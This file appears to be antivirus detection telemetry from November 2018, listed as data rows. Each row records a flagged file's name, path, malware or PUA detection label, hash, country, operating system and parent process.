  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:13:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0008f8b5', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp0008f8b5', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:06:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.BW.#M1.#R1'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\PC Faster\\5.1.0.0\\Cloud Security\\BCloudScan.exe', parentsize=2265456, timestamp='2018-11-04T15:10:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:46:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134134-bf4891d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab7724b5\\AVSCAN-20181104-134121-BD1A7C06\\AVSCAN-20181104-134134-BF4891D3', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='071b6238e972219e9521a64908ada6143b97ac1e83b9439930dc9901c9ae82be', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:41:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000a2b80', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp000a2b80', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:08:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:57:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:45:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maskitservice.exe', filepath='C:\\Program Files (x86)\\Maskit\\MaskitService.exe', filesize=64000, name='Adware/Agent.cpdes.#M1.#R1'), hash='1e1dbfbbd2200ab8bd10445b01ef228d054a09dbf8b6036d921420e625055c22', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\services.exe', parentsize=None, timestamp='2018-11-04T09:04:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-171553-7f4e5686', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-171553-7F4E5686', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:15:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T03:48:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:08:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='опись документов 1.1.exe', filepath='\\\\?\\F:\\Проф\\Опись документов 1.1.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='07c5a52329e42aa99f7582672622be8164b4605129da966a4279eac849e0c54c', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (2).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T13:49:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='7001fec3fedc9a3625b2d72107d85c8686f29fa3', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\7001fec3fedc9a3625b2d72107d85c8686f29fa3', filesize=320000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='0adcd7f228fcc08807fbd8c0abb1db554e91e15f3c6e1171ae3a24a02b920d05', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:16:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='blocada_kh_v15.exe', filepath='C:\\Users\\X\\Pictures\\Blocada_KH_v15.exe', filesize=9344000, name='TR/Spy.Banker.Gen4.#M300.#R100338'), hash='9cd534d450db8b6b053240cd6d16cb3e3daefd32527d50b8f6ec0866934397c6', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T16:40:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='9817ab650882f71b16a47cdef489c0c1edde5abeec990a9c55e601cc33cab0d3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:42:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T05:51:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hx.exe', filepath='c:\\users\\X\\appdata\\roaming\\hx.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:45:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='keygen.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\FastKeys.v4.13_p30download.com\\Keygen\\Keygen.exe', filesize=192000, name='HEUR/AGEN.1018957.#M1.#R1'), hash='766eaace216cc2443cb5b9b17f55a05af178aeb134d0d8da4ea9eadcf542190f', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4528168, timestamp='2018-11-02T15:10:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-210103-7d1354e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e62a03c9\\AVSCAN-20181102-210049-7AF2AB90\\AVSCAN-20181102-210103-7D1354E8', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:01:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='humanplayer.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\humanplayer\\humanplayer.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='75afa9a82f394c1ae3b1bf27314a64a87bddd0cfd5f8a1508409ecd5a0cde3ba', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qs2onrda2.exe', filepath='\\\\?\\C:\\Program Files\\QS2ONRDA2H\\QS2ONRDA2.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:11:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='evcreate.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\evcreate.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='9a55f7cadd5ffb14ae6cf9dc8955b09233830461091378fe1476ebeef4431e23', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:10:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00658a40', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00658a40', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:45:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='visualboyadvance.exe', filepath='E:\\c\\Compressed\\VisualBoyAdvance.exe', filesize=2048000, name='W32/Small.L.#M1.#R1'), hash='e53e4338f45df25a8bed599ef90749cff5e310c99a6b057e992a2093383744cb', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T22:51:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='67b4155e-cd9c-6e5e-7503-f45efddff361.exe', filepath='G:\\{1c2c5a2b-abfc-3445-f75b-90141c2f296d}\\67b4155e-cd9c-6e5e-7503-f45efddff361.exe', filesize=256000, name='TR/Qadars.DW.#M1.#R1'), hash='eeb05cb6449871a2c95dc56268ad0a29828a440b1bfe728ae9d8b7b178fcabf6', metadata=Row(cmdline='\\\\\\/c \\\\\\"{1c2c5a2b-abfc-3445-f75b-90141c2f296d}\\\\\\\\67b4155e-cd9c-6e5e-7503-f45efddff361.exe \'ا ب ت ث ج ح خ د ذ ر ز س ش ص ض ط ظ ع غ ف ق ك ل م ن ه و ي.doc\'\\\\\\"', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=302592, timestamp='2018-11-02T18:41:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212433-6cd4af62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_956d8945\\AVSCAN-20181102-210357-9072E9CB\\AVSCAN-20181102-212433-6CD4AF62', filesize=20000, name='DR/FakePic.Gen.#M1.#R1'), hash='e4d2c1791fd26ad14c122fe06186c729fbffa96dcb06a4fc67ccf867de1b88bd', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:24:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-02T00:55:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='french.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\LANGUAGE\\FRENCH\\FRENCH.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e82b3935870df0344fbde79f0ab41a998ccb9c9cace45fd749bac407960e27e4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsoFB7D.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:07:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='efd64b41a1ad5fb75a7774e9040ba55eb13713e23b56909f9ac56c56b21f1446', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp17rg51d5', filepath='/tmp/tmp17rg51d5', filesize=13016000, name='Android/FakeApp.CH.Gen.#M14.#R501708'), hash='903456810c791b0f0e1c33edeb0add3ada6d607f912c25c8f736fbcdef064ae9', metadata=Row(cmdline=None, country='US', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:34:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ntbootautofix.exe', filepath='E:\\HBCD\\Programs\\NTBOOTAutoFix.exe', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-215858-e5e87581', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7db8a42e\\AVSCAN-20181102-215834-E2DAC39E\\AVSCAN-20181102-215858-E5E87581', filesize=1792000, name='APPL/RedCap.#M1.#R1'), hash='9c9e96993d0b0903569690bfce26c5d7dbf38f9cdb90830deb89b0bbd21e63ed', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:58:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-070434-c7daadef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_505ccb7e\\AVSCAN-20181102-065948-A6B81FA2\\AVSCAN-20181102-070434-C7DAADEF', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='GY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:04:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-072013-a5adc7d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-233739-5B760E05\\AVSCAN-20181102-072013-A5ADC7D3', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b24400c7c450310be4898d071e7e8a7cfac3575a13e17fb9735814410aeeae19.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B24400C7C450310BE4898D071E7E8A7CFAC3575A13E17FB9735814410AEEAE19.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b24400c7c450310be4898d071e7e8a7cfac3575a13e17fb9735814410aeeae19', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:48:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp7999zolg', filepath='/tmp/tmp7999zolg', filesize=584000, name='TR/Dropper.VB.b60a2d.#M1.#R1'), hash='b60a2df189b459696768ff978799e748c5b043d1a97652589239b42c76cc2af6', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T15:52:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='анкеты и заявка 2016 год.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Анкеты и заявка 2016 год\\Анкеты и заявка 2016 год.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:51:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-114628-9d055d53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6e05da2\\AVSCAN-20181102-114133-850AED94\\AVSCAN-20181102-114628-9D055D53', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T10:46:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsm6FA3.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-02T06:30:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101937-9bbb87f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101937-9BBB87F8', filesize=64000, name='TR/Siggen.64000.#M1.#R1'), hash='b6818febad1804ad62284091c33fe091df1ac21054495fd682540108b7386041', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='malaysia 2013a.exe', filepath='I:\\Local Disk\\maljogja\\Malaysia 2013A.exe', filesize=1536000, name='W32/Sality.AW.#M1.#R1'), hash='b6f616b8b8d7c379da50992ce2635b5e9b513e91ec3f27412793d23f872cbd2c', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=None, timestamp='2018-11-02T07:44:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-040718-28f7b5c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-040718-28F7B5C9', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='f12d1a47253f323bc30873cfcb535d66a338a562c86a73383353e561c8ccce33', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\h5yqnl5yb4e\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:18:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-072626-dde04814', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234137-7F763213\\AVSCAN-20181102-072626-DDE04814', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hrl1.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl1.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238908', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238908', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:26:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vip_005_setup.exe', filepath='\\\\?\\C:\\Program Files (x86)\\vip_005_setup\\vip_005_setup.exe', filesize=4708000, name='HEUR/AGEN.1019074.#M1.#R1'), hash='fd008bdfa51be94b79b83a06b0630a3c919734ee1f7c796b3e0d47a66e0bdf4d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:30:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-182324-04bab2de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-182324-04BAB2DE', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:23:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185048-e05081d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-185048-E05081D0', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:50:45Z'), dt=datetime.date(2018, 11, 4)),
